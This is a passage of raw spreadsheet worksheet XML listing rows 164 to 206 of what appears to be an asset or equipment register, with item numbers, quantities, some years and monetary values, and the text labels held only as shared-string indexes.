      <c r="I164" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J164" s="100">
        <v>2994000</v>
      </c>
      <c r="K164" s="99">
        <v>0</v>
      </c>
      <c r="L164" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M164" s="225"/>
    </row>
    <row r="165" ht="14.25" customHeight="1" spans="2:13">
      <c r="B165" s="11">
        <v>157</v>
      </c>
      <c r="C165" s="237" t="s">
        <v>683</v>
      </c>
      <c r="D165" s="238" t="s">
        <v>684</v>
      </c>
      <c r="E165" s="237" t="s">
        <v>685</v>
      </c>
      <c r="F165" s="17"/>
      <c r="G165" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H165" s="11">
        <v>1</v>
      </c>
      <c r="I165" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J165" s="100">
        <v>212000</v>
      </c>
      <c r="K165" s="99">
        <v>40320</v>
      </c>
      <c r="L165" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M165" s="225"/>
    </row>
    <row r="166" ht="14.25" customHeight="1" spans="2:13">
      <c r="B166" s="16">
        <v>158</v>
      </c>
      <c r="C166" s="237" t="s">
        <v>686</v>
      </c>
      <c r="D166" s="238" t="s">
        <v>687</v>
      </c>
      <c r="E166" s="237" t="s">
        <v>446</v>
      </c>
      <c r="F166" s="17"/>
      <c r="G166" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H166" s="11">
        <v>1</v>
      </c>
      <c r="I166" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J166" s="100">
        <v>346000</v>
      </c>
      <c r="K166" s="99">
        <v>76160</v>
      </c>
      <c r="L166" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M166" s="225"/>
    </row>
    <row r="167" ht="14.25" customHeight="1" spans="2:13">
      <c r="B167" s="11">
        <v>159</v>
      </c>
      <c r="C167" s="237" t="s">
        <v>688</v>
      </c>
      <c r="D167" s="238" t="s">
        <v>689</v>
      </c>
      <c r="E167" s="237" t="s">
        <v>690</v>
      </c>
      <c r="F167" s="17"/>
      <c r="G167" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H167" s="11">
        <v>2</v>
      </c>
      <c r="I167" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J167" s="100">
        <v>926000</v>
      </c>
      <c r="K167" s="99">
        <v>201600</v>
      </c>
      <c r="L167" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M167" s="225"/>
    </row>
    <row r="168" ht="14.25" customHeight="1" spans="2:13">
      <c r="B168" s="16">
        <v>160</v>
      </c>
      <c r="C168" s="237" t="s">
        <v>691</v>
      </c>
      <c r="D168" s="238" t="s">
        <v>692</v>
      </c>
      <c r="E168" s="237" t="s">
        <v>693</v>
      </c>
      <c r="F168" s="17"/>
      <c r="G168" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H168" s="11">
        <v>1</v>
      </c>
      <c r="I168" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J168" s="100">
        <v>417376.07</v>
      </c>
      <c r="K168" s="99">
        <v>91840</v>
      </c>
      <c r="L168" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M168" s="225"/>
    </row>
    <row r="169" ht="14.25" customHeight="1" spans="2:13">
      <c r="B169" s="11">
        <v>161</v>
      </c>
      <c r="C169" s="237" t="s">
        <v>694</v>
      </c>
      <c r="D169" s="238" t="s">
        <v>247</v>
      </c>
      <c r="E169" s="237" t="s">
        <v>583</v>
      </c>
      <c r="F169" s="17"/>
      <c r="G169" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H169" s="11">
        <v>1</v>
      </c>
      <c r="I169" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J169" s="100">
        <v>145000</v>
      </c>
      <c r="K169" s="99">
        <v>32480</v>
      </c>
      <c r="L169" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M169" s="225"/>
    </row>
    <row r="170" ht="14.25" customHeight="1" spans="2:13">
      <c r="B170" s="16">
        <v>162</v>
      </c>
      <c r="C170" s="237" t="s">
        <v>695</v>
      </c>
      <c r="D170" s="238" t="s">
        <v>696</v>
      </c>
      <c r="E170" s="237" t="s">
        <v>697</v>
      </c>
      <c r="F170" s="17"/>
      <c r="G170" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H170" s="11">
        <v>1</v>
      </c>
      <c r="I170" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J170" s="100">
        <v>169000</v>
      </c>
      <c r="K170" s="99">
        <v>35840</v>
      </c>
      <c r="L170" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M170" s="225"/>
    </row>
    <row r="171" ht="14.25" customHeight="1" spans="2:13">
      <c r="B171" s="11">
        <v>163</v>
      </c>
      <c r="C171" s="237" t="s">
        <v>698</v>
      </c>
      <c r="D171" s="238" t="s">
        <v>352</v>
      </c>
      <c r="E171" s="237" t="s">
        <v>699</v>
      </c>
      <c r="F171" s="17"/>
      <c r="G171" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H171" s="11">
        <v>1</v>
      </c>
      <c r="I171" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J171" s="100">
        <v>1472000</v>
      </c>
      <c r="K171" s="99">
        <v>190400</v>
      </c>
      <c r="L171" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M171" s="225"/>
    </row>
    <row r="172" ht="14.25" customHeight="1" spans="2:13">
      <c r="B172" s="16">
        <v>164</v>
      </c>
      <c r="C172" s="237" t="s">
        <v>700</v>
      </c>
      <c r="D172" s="238" t="s">
        <v>701</v>
      </c>
      <c r="E172" s="237" t="s">
        <v>702</v>
      </c>
      <c r="F172" s="17"/>
      <c r="G172" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H172" s="11">
        <v>1</v>
      </c>
      <c r="I172" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J172" s="100">
        <v>421000</v>
      </c>
      <c r="K172" s="99">
        <v>94304</v>
      </c>
      <c r="L172" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M172" s="225"/>
    </row>
    <row r="173" ht="14.25" customHeight="1" spans="2:13">
      <c r="B173" s="11">
        <v>165</v>
      </c>
      <c r="C173" s="237" t="s">
        <v>703</v>
      </c>
      <c r="D173" s="238" t="s">
        <v>704</v>
      </c>
      <c r="E173" s="237" t="s">
        <v>705</v>
      </c>
      <c r="F173" s="17"/>
      <c r="G173" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H173" s="11">
        <v>1</v>
      </c>
      <c r="I173" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J173" s="100">
        <v>444658.12</v>
      </c>
      <c r="K173" s="99">
        <v>89600</v>
      </c>
      <c r="L173" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M173" s="225"/>
    </row>
    <row r="174" ht="14.25" customHeight="1" spans="2:13">
      <c r="B174" s="16">
        <v>166</v>
      </c>
      <c r="C174" s="237" t="s">
        <v>706</v>
      </c>
      <c r="D174" s="238" t="s">
        <v>707</v>
      </c>
      <c r="E174" s="237" t="s">
        <v>708</v>
      </c>
      <c r="F174" s="17"/>
      <c r="G174" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H174" s="11">
        <v>1</v>
      </c>
      <c r="I174" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J174" s="100">
        <v>84400</v>
      </c>
      <c r="K174" s="99">
        <v>18816</v>
      </c>
      <c r="L174" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M174" s="225"/>
    </row>
    <row r="175" ht="14.25" customHeight="1" spans="2:13">
      <c r="B175" s="11">
        <v>167</v>
      </c>
      <c r="C175" s="237" t="s">
        <v>709</v>
      </c>
      <c r="D175" s="238" t="s">
        <v>278</v>
      </c>
      <c r="E175" s="237" t="s">
        <v>710</v>
      </c>
      <c r="F175" s="17"/>
      <c r="G175" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H175" s="11">
        <v>1</v>
      </c>
      <c r="I175" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J175" s="100">
        <v>384100</v>
      </c>
      <c r="K175" s="99">
        <v>80640</v>
      </c>
      <c r="L175" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M175" s="225"/>
    </row>
    <row r="176" ht="14.25" customHeight="1" spans="2:13">
      <c r="B176" s="16">
        <v>168</v>
      </c>
      <c r="C176" s="237" t="s">
        <v>711</v>
      </c>
      <c r="D176" s="238" t="s">
        <v>712</v>
      </c>
      <c r="E176" s="237" t="s">
        <v>708</v>
      </c>
      <c r="F176" s="17"/>
      <c r="G176" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H176" s="11">
        <v>1</v>
      </c>
      <c r="I176" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J176" s="100">
        <v>192100</v>
      </c>
      <c r="K176" s="99">
        <v>43008</v>
      </c>
      <c r="L176" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M176" s="225"/>
    </row>
    <row r="177" ht="14.25" customHeight="1" spans="2:13">
      <c r="B177" s="11">
        <v>169</v>
      </c>
      <c r="C177" s="237" t="s">
        <v>713</v>
      </c>
      <c r="D177" s="238" t="s">
        <v>361</v>
      </c>
      <c r="E177" s="237" t="s">
        <v>714</v>
      </c>
      <c r="F177" s="17"/>
      <c r="G177" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H177" s="11">
        <v>1</v>
      </c>
      <c r="I177" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J177" s="100">
        <v>191100</v>
      </c>
      <c r="K177" s="99">
        <v>42784</v>
      </c>
      <c r="L177" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M177" s="225"/>
    </row>
    <row r="178" ht="14.25" customHeight="1" spans="2:13">
      <c r="B178" s="16">
        <v>170</v>
      </c>
      <c r="C178" s="237" t="s">
        <v>715</v>
      </c>
      <c r="D178" s="238" t="s">
        <v>716</v>
      </c>
      <c r="E178" s="237" t="s">
        <v>717</v>
      </c>
      <c r="F178" s="17"/>
      <c r="G178" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H178" s="11">
        <v>2</v>
      </c>
      <c r="I178" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J178" s="100">
        <v>84900</v>
      </c>
      <c r="K178" s="99">
        <v>17696</v>
      </c>
      <c r="L178" s="239" t="s">
        <v>718</v>
      </c>
      <c r="M178" s="225"/>
    </row>
    <row r="179" ht="14.25" customHeight="1" spans="2:13">
      <c r="B179" s="11">
        <v>171</v>
      </c>
      <c r="C179" s="237" t="s">
        <v>719</v>
      </c>
      <c r="D179" s="238" t="s">
        <v>720</v>
      </c>
      <c r="E179" s="237" t="s">
        <v>721</v>
      </c>
      <c r="F179" s="17"/>
      <c r="G179" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H179" s="11">
        <v>2</v>
      </c>
      <c r="I179" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J179" s="100">
        <v>161500</v>
      </c>
      <c r="K179" s="99">
        <v>35392</v>
      </c>
      <c r="L179" s="239" t="s">
        <v>718</v>
      </c>
      <c r="M179" s="225"/>
    </row>
    <row r="180" ht="14.25" customHeight="1" spans="2:13">
      <c r="B180" s="16">
        <v>172</v>
      </c>
      <c r="C180" s="237" t="s">
        <v>722</v>
      </c>
      <c r="D180" s="238" t="s">
        <v>723</v>
      </c>
      <c r="E180" s="237" t="s">
        <v>724</v>
      </c>
      <c r="F180" s="17"/>
      <c r="G180" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H180" s="11">
        <v>2</v>
      </c>
      <c r="I180" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J180" s="100">
        <v>84500</v>
      </c>
      <c r="K180" s="99">
        <v>19344</v>
      </c>
      <c r="L180" s="239" t="s">
        <v>726</v>
      </c>
      <c r="M180" s="225"/>
    </row>
    <row r="181" ht="14.25" customHeight="1" spans="2:13">
      <c r="B181" s="11">
        <v>173</v>
      </c>
      <c r="C181" s="237" t="s">
        <v>727</v>
      </c>
      <c r="D181" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E181" s="237" t="s">
        <v>728</v>
      </c>
      <c r="F181" s="17"/>
      <c r="G181" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H181" s="11">
        <v>1</v>
      </c>
      <c r="I181" s="237" t="s">
        <v>729</v>
      </c>
      <c r="J181" s="100">
        <v>33000</v>
      </c>
      <c r="K181" s="99">
        <v>11718</v>
      </c>
      <c r="L181" s="239" t="s">
        <v>730</v>
      </c>
      <c r="M181" s="225"/>
    </row>
    <row r="182" ht="14.25" customHeight="1" spans="2:13">
      <c r="B182" s="16">
        <v>174</v>
      </c>
      <c r="C182" s="237" t="s">
        <v>731</v>
      </c>
      <c r="D182" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E182" s="237" t="s">
        <v>732</v>
      </c>
      <c r="F182" s="17"/>
      <c r="G182" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H182" s="11">
        <v>1</v>
      </c>
      <c r="I182" s="237" t="s">
        <v>452</v>
      </c>
      <c r="J182" s="100">
        <v>33000</v>
      </c>
      <c r="K182" s="99">
        <v>10912</v>
      </c>
      <c r="L182" s="239" t="s">
        <v>733</v>
      </c>
      <c r="M182" s="225"/>
    </row>
    <row r="183" ht="14.25" customHeight="1" spans="2:13">
      <c r="B183" s="11">
        <v>175</v>
      </c>
      <c r="C183" s="237" t="s">
        <v>734</v>
      </c>
      <c r="D183" s="238" t="s">
        <v>735</v>
      </c>
      <c r="E183" s="237" t="s">
        <v>736</v>
      </c>
      <c r="F183" s="17"/>
      <c r="G183" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H183" s="11">
        <v>1</v>
      </c>
      <c r="I183" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J183" s="100">
        <v>1794000</v>
      </c>
      <c r="K183" s="99">
        <v>358400</v>
      </c>
      <c r="L183" s="239" t="s">
        <v>737</v>
      </c>
      <c r="M183" s="225"/>
    </row>
    <row r="184" ht="14.25" customHeight="1" spans="2:13">
      <c r="B184" s="16">
        <v>176</v>
      </c>
      <c r="C184" s="237" t="s">
        <v>738</v>
      </c>
      <c r="D184" s="238" t="s">
        <v>739</v>
      </c>
      <c r="E184" s="237" t="s">
        <v>740</v>
      </c>
      <c r="F184" s="17"/>
      <c r="G184" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H184" s="11">
        <v>1</v>
      </c>
      <c r="I184" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J184" s="100">
        <v>109900</v>
      </c>
      <c r="K184" s="99">
        <v>20160</v>
      </c>
      <c r="L184" s="239" t="s">
        <v>737</v>
      </c>
      <c r="M184" s="225"/>
    </row>
    <row r="185" ht="14.25" customHeight="1" spans="2:13">
      <c r="B185" s="11">
        <v>177</v>
      </c>
      <c r="C185" s="237" t="s">
        <v>741</v>
      </c>
      <c r="D185" s="238" t="s">
        <v>742</v>
      </c>
      <c r="E185" s="237" t="s">
        <v>743</v>
      </c>
      <c r="F185" s="17"/>
      <c r="G185" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H185" s="11">
        <v>2</v>
      </c>
      <c r="I185" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J185" s="100">
        <v>30000</v>
      </c>
      <c r="K185" s="99">
        <v>5824</v>
      </c>
      <c r="L185" s="239" t="s">
        <v>737</v>
      </c>
      <c r="M185" s="225"/>
    </row>
    <row r="186" ht="14.25" customHeight="1" spans="2:13">
      <c r="B186" s="16">
        <v>178</v>
      </c>
      <c r="C186" s="237" t="s">
        <v>744</v>
      </c>
      <c r="D186" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E186" s="237" t="s">
        <v>745</v>
      </c>
      <c r="F186" s="17"/>
      <c r="G186" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H186" s="11">
        <v>1</v>
      </c>
      <c r="I186" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J186" s="100">
        <v>2000</v>
      </c>
      <c r="K186" s="99">
        <v>448</v>
      </c>
      <c r="L186" s="239" t="s">
        <v>737</v>
      </c>
      <c r="M186" s="225"/>
    </row>
    <row r="187" ht="14.25" customHeight="1" spans="2:13">
      <c r="B187" s="11">
        <v>179</v>
      </c>
      <c r="C187" s="237" t="s">
        <v>746</v>
      </c>
      <c r="D187" s="238" t="s">
        <v>259</v>
      </c>
      <c r="E187" s="237" t="s">
        <v>747</v>
      </c>
      <c r="F187" s="17"/>
      <c r="G187" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H187" s="11">
        <v>1</v>
      </c>
      <c r="I187" s="237" t="s">
        <v>748</v>
      </c>
      <c r="J187" s="100">
        <v>5788240</v>
      </c>
      <c r="K187" s="99">
        <v>1254400</v>
      </c>
      <c r="L187" s="239" t="s">
        <v>737</v>
      </c>
      <c r="M187" s="225"/>
    </row>
    <row r="188" ht="14.25" customHeight="1" spans="2:13">
      <c r="B188" s="16">
        <v>180</v>
      </c>
      <c r="C188" s="237" t="s">
        <v>749</v>
      </c>
      <c r="D188" s="238" t="s">
        <v>750</v>
      </c>
      <c r="E188" s="237" t="s">
        <v>751</v>
      </c>
      <c r="F188" s="17"/>
      <c r="G188" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H188" s="11">
        <v>1</v>
      </c>
      <c r="I188" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J188" s="100">
        <v>6000</v>
      </c>
      <c r="K188" s="99">
        <v>13888</v>
      </c>
      <c r="L188" s="239" t="s">
        <v>752</v>
      </c>
      <c r="M188" s="225"/>
    </row>
    <row r="189" ht="14.25" customHeight="1" spans="2:13">
      <c r="B189" s="11">
        <v>181</v>
      </c>
      <c r="C189" s="237" t="s">
        <v>753</v>
      </c>
      <c r="D189" s="238" t="s">
        <v>754</v>
      </c>
      <c r="E189" s="237" t="s">
        <v>755</v>
      </c>
      <c r="F189" s="17"/>
      <c r="G189" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H189" s="11">
        <v>1</v>
      </c>
      <c r="I189" s="237" t="s">
        <v>756</v>
      </c>
      <c r="J189" s="100">
        <v>42735.04</v>
      </c>
      <c r="K189" s="99">
        <v>10336</v>
      </c>
      <c r="L189" s="239" t="s">
        <v>757</v>
      </c>
      <c r="M189" s="225"/>
    </row>
    <row r="190" ht="14.25" customHeight="1" spans="2:13">
      <c r="B190" s="16">
        <v>182</v>
      </c>
      <c r="C190" s="237" t="s">
        <v>758</v>
      </c>
      <c r="D190" s="238" t="s">
        <v>759</v>
      </c>
      <c r="E190" s="237" t="s">
        <v>760</v>
      </c>
      <c r="F190" s="17"/>
      <c r="G190" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H190" s="11">
        <v>1</v>
      </c>
      <c r="I190" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J190" s="100">
        <v>25000</v>
      </c>
      <c r="K190" s="99">
        <v>44640</v>
      </c>
      <c r="L190" s="239" t="s">
        <v>761</v>
      </c>
      <c r="M190" s="225"/>
    </row>
    <row r="191" ht="14.25" customHeight="1" spans="1:13">
      <c r="A191" s="175"/>
      <c r="B191" s="11">
        <v>183</v>
      </c>
      <c r="C191" s="237" t="s">
        <v>762</v>
      </c>
      <c r="D191" s="238" t="s">
        <v>763</v>
      </c>
      <c r="E191" s="237" t="s">
        <v>764</v>
      </c>
      <c r="F191" s="17"/>
      <c r="G191" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H191" s="11">
        <v>1</v>
      </c>
      <c r="I191" s="237" t="s">
        <v>765</v>
      </c>
      <c r="J191" s="100">
        <v>83000</v>
      </c>
      <c r="K191" s="99">
        <v>19592</v>
      </c>
      <c r="L191" s="239" t="s">
        <v>766</v>
      </c>
      <c r="M191" s="225"/>
    </row>
    <row r="192" ht="14.25" customHeight="1" spans="2:13">
      <c r="B192" s="16">
        <v>184</v>
      </c>
      <c r="C192" s="237" t="s">
        <v>767</v>
      </c>
      <c r="D192" s="238" t="s">
        <v>768</v>
      </c>
      <c r="E192" s="11"/>
      <c r="F192" s="17"/>
      <c r="G192" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H192" s="11">
        <v>1</v>
      </c>
      <c r="I192" s="237" t="s">
        <v>612</v>
      </c>
      <c r="J192" s="100">
        <v>280000</v>
      </c>
      <c r="K192" s="99">
        <v>64480</v>
      </c>
      <c r="L192" s="239" t="s">
        <v>769</v>
      </c>
      <c r="M192" s="225"/>
    </row>
    <row r="193" ht="14.25" customHeight="1" spans="2:13">
      <c r="B193" s="11">
        <v>185</v>
      </c>
      <c r="C193" s="237" t="s">
        <v>770</v>
      </c>
      <c r="D193" s="238" t="s">
        <v>771</v>
      </c>
      <c r="E193" s="237" t="s">
        <v>772</v>
      </c>
      <c r="F193" s="17"/>
      <c r="G193" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H193" s="11">
        <v>2</v>
      </c>
      <c r="I193" s="237" t="s">
        <v>773</v>
      </c>
      <c r="J193" s="100">
        <v>600000</v>
      </c>
      <c r="K193" s="99">
        <v>170100</v>
      </c>
      <c r="L193" s="239" t="s">
        <v>774</v>
      </c>
      <c r="M193" s="225"/>
    </row>
    <row r="194" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A194" s="176"/>
      <c r="B194" s="16">
        <v>186</v>
      </c>
      <c r="C194" s="237" t="s">
        <v>775</v>
      </c>
      <c r="D194" s="238" t="s">
        <v>525</v>
      </c>
      <c r="E194" s="237" t="s">
        <v>526</v>
      </c>
      <c r="F194" s="201"/>
      <c r="G194" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H194" s="11">
        <v>1</v>
      </c>
      <c r="I194" s="237" t="s">
        <v>776</v>
      </c>
      <c r="J194" s="100">
        <v>89743.59</v>
      </c>
      <c r="K194" s="99">
        <v>0</v>
      </c>
      <c r="L194" s="239" t="s">
        <v>777</v>
      </c>
      <c r="M194" s="225"/>
    </row>
    <row r="195" ht="14.25" customHeight="1" spans="2:13">
      <c r="B195" s="11">
        <v>187</v>
      </c>
      <c r="C195" s="237" t="s">
        <v>778</v>
      </c>
      <c r="D195" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E195" s="237" t="s">
        <v>779</v>
      </c>
      <c r="F195" s="17"/>
      <c r="G195" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H195" s="11">
        <v>1</v>
      </c>
      <c r="I195" s="237" t="s">
        <v>780</v>
      </c>
      <c r="J195" s="100">
        <v>33000</v>
      </c>
      <c r="K195" s="99">
        <v>9450</v>
      </c>
      <c r="L195" s="239" t="s">
        <v>781</v>
      </c>
      <c r="M195" s="225"/>
    </row>
    <row r="196" ht="14.25" customHeight="1" spans="2:13">
      <c r="B196" s="16">
        <v>188</v>
      </c>
      <c r="C196" s="237" t="s">
        <v>782</v>
      </c>
      <c r="D196" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E196" s="237" t="s">
        <v>783</v>
      </c>
      <c r="F196" s="17"/>
      <c r="G196" s="16" t="s">
        <v>461</v>
      </c>
      <c r="H196" s="11">
        <v>1</v>
      </c>
      <c r="I196" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J196" s="100">
        <v>16239.32</v>
      </c>
      <c r="K196" s="99">
        <v>6336</v>
      </c>
      <c r="L196" s="96" t="s">
        <v>784</v>
      </c>
      <c r="M196" s="225"/>
    </row>
    <row r="197" ht="14.25" customHeight="1" spans="2:13">
      <c r="B197" s="11">
        <v>189</v>
      </c>
      <c r="C197" s="237" t="s">
        <v>785</v>
      </c>
      <c r="D197" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E197" s="237" t="s">
        <v>786</v>
      </c>
      <c r="F197" s="17"/>
      <c r="G197" s="16" t="s">
        <v>461</v>
      </c>
      <c r="H197" s="11">
        <v>1</v>
      </c>
      <c r="I197" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J197" s="100">
        <v>22222.22</v>
      </c>
      <c r="K197" s="99">
        <v>7200</v>
      </c>
      <c r="L197" s="96" t="s">
        <v>784</v>
      </c>
      <c r="M197" s="225"/>
    </row>
    <row r="198" ht="14.25" customHeight="1" spans="2:13">
      <c r="B198" s="16">
        <v>190</v>
      </c>
      <c r="C198" s="11"/>
      <c r="D198" s="10" t="s">
        <v>787</v>
      </c>
      <c r="E198" s="10" t="s">
        <v>788</v>
      </c>
      <c r="F198" s="9"/>
      <c r="G198" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H198" s="11">
        <v>1</v>
      </c>
      <c r="I198" s="11"/>
      <c r="J198" s="91"/>
      <c r="K198" s="99">
        <v>24960</v>
      </c>
      <c r="L198" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M198" s="225"/>
    </row>
    <row r="199" ht="14.25" customHeight="1" spans="2:13">
      <c r="B199" s="11">
        <v>191</v>
      </c>
      <c r="C199" s="11"/>
      <c r="D199" s="10" t="s">
        <v>789</v>
      </c>
      <c r="E199" s="10" t="s">
        <v>790</v>
      </c>
      <c r="F199" s="9"/>
      <c r="G199" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H199" s="11">
        <v>1</v>
      </c>
      <c r="I199" s="11"/>
      <c r="J199" s="91"/>
      <c r="K199" s="99">
        <v>3328</v>
      </c>
      <c r="L199" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M199" s="225"/>
    </row>
    <row r="200" ht="14.25" customHeight="1" spans="2:13">
      <c r="B200" s="16">
        <v>192</v>
      </c>
      <c r="C200" s="11"/>
      <c r="D200" s="10" t="s">
        <v>791</v>
      </c>
      <c r="E200" s="10" t="s">
        <v>792</v>
      </c>
      <c r="F200" s="9"/>
      <c r="G200" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H200" s="11">
        <v>1</v>
      </c>
      <c r="I200" s="11"/>
      <c r="J200" s="91"/>
      <c r="K200" s="99">
        <v>12480</v>
      </c>
      <c r="L200" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M200" s="225"/>
    </row>
    <row r="201" ht="14.25" customHeight="1" spans="2:13">
      <c r="B201" s="11">
        <v>193</v>
      </c>
      <c r="C201" s="11"/>
      <c r="D201" s="10" t="s">
        <v>793</v>
      </c>
      <c r="E201" s="10" t="s">
        <v>794</v>
      </c>
      <c r="F201" s="9" t="s">
        <v>795</v>
      </c>
      <c r="G201" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H201" s="11">
        <v>1</v>
      </c>
      <c r="I201" s="11"/>
      <c r="J201" s="91"/>
      <c r="K201" s="99">
        <v>2496</v>
      </c>
      <c r="L201" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M201" s="225"/>
    </row>
    <row r="202" ht="14.25" customHeight="1" spans="2:13">
      <c r="B202" s="16">
        <v>194</v>
      </c>
      <c r="C202" s="11"/>
      <c r="D202" s="10" t="s">
        <v>796</v>
      </c>
      <c r="E202" s="10" t="s">
        <v>797</v>
      </c>
      <c r="F202" s="9" t="s">
        <v>795</v>
      </c>
      <c r="G202" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H202" s="11">
        <v>1</v>
      </c>
      <c r="I202" s="11">
        <v>2011</v>
      </c>
      <c r="J202" s="91"/>
      <c r="K202" s="99">
        <v>52704</v>
      </c>
      <c r="L202" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M202" s="225"/>
    </row>
    <row r="203" ht="14.25" customHeight="1" spans="2:13">
      <c r="B203" s="11">
        <v>195</v>
      </c>
      <c r="C203" s="11"/>
      <c r="D203" s="10" t="s">
        <v>798</v>
      </c>
      <c r="E203" s="10" t="s">
        <v>799</v>
      </c>
      <c r="F203" s="9" t="s">
        <v>800</v>
      </c>
      <c r="G203" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H203" s="11">
        <v>1</v>
      </c>
      <c r="I203" s="11">
        <v>2007</v>
      </c>
      <c r="J203" s="91"/>
      <c r="K203" s="99">
        <v>17920</v>
      </c>
      <c r="L203" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M203" s="225"/>
    </row>
    <row r="204" ht="14.25" customHeight="1" spans="2:13">
      <c r="B204" s="16">
        <v>196</v>
      </c>
      <c r="C204" s="11"/>
      <c r="D204" s="10" t="s">
        <v>801</v>
      </c>
      <c r="E204" s="10"/>
      <c r="F204" s="9"/>
      <c r="G204" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H204" s="11">
        <v>1</v>
      </c>
      <c r="I204" s="11"/>
      <c r="J204" s="91"/>
      <c r="K204" s="99">
        <v>9152</v>
      </c>
      <c r="L204" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M204" s="225"/>
    </row>
    <row r="205" ht="14.25" customHeight="1" spans="2:13">
      <c r="B205" s="11">
        <v>197</v>
      </c>
      <c r="C205" s="11"/>
      <c r="D205" s="10" t="s">
        <v>802</v>
      </c>
      <c r="E205" s="10"/>
      <c r="F205" s="9"/>
      <c r="G205" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H205" s="11">
        <v>1</v>
      </c>
      <c r="I205" s="11"/>
      <c r="J205" s="91"/>
      <c r="K205" s="99">
        <v>4992</v>
      </c>
      <c r="L205" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M205" s="225"/>
    </row>
    <row r="206" ht="14.25" customHeight="1" spans="2:13">
      <c r="B206" s="16">
        <v>198</v>
      </c>
      <c r="C206" s="11"/>
      <c r="D206" s="10" t="s">
        <v>803</v>
      </c>
      <c r="E206" s="10" t="s">
        <v>804</v>
      </c>
      <c r="F206" s="9" t="s">
        <v>805</v>
      </c>
      <c r="G206" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H206" s="11">
        <v>1</v>
      </c>
      <c r="I206" s="11">
        <v>2007</v>
      </c>
      <c r="J206" s="91"/>
      <c r="K206" s="99">
        <v>2688</v>
      </c>
      <c r="L206" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M206" s="225"/>
    </row>
    <row r="207" ht="14.25" customHeight="1" spans="2:13">
